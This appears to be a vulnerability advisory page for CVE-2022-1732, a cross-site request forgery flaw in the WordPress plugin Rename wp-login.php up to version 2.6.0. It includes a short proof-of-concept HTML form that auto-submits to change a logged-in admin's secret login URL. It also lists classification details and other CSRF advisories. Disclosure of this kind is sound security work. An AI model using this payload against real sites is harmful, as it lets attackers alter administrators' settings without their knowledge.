Rename wp-login.php <= 2.6.0 – Secret URL Update via CSRF | CVE 2022-1732 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating the secret login URL, which could allow attackers to make a logged in admin change them via a CSRF attack

Proof of Concept

<form id="test" action="https://example.com/wp-admin/options-permalink.php" method="POST">
    <input type="text" name="rwl_page" value="sesame-open">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

rename-wp-login

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

3620a087-032e-4a5f-99c8-f9e7e9c29813

Timeline

Publicly Published

2022-06-16 (about 3 years ago)

Added

2022-06-16 (about 3 years ago)

Last Updated

2023-03-21 (about 2 years ago)

Other

Published

Title

Published

2025-04-01

Title

Product Notices for WooCommerce <= 1.3.3 - Cross-Site Request Forgery

Published

2025-09-29

Title

LockerPress – WordPress Security Plugin <= 1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-06-05

Title

Anti-Spam: Spam Protection < 2025 - Multiple Administrative Actions via CSRF

Published

2025-02-13

Title

Post Thumbs <= 1.5 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2023-11-28

Title

Button Generator < 2.3.9 - Button Counter Reset via CSRF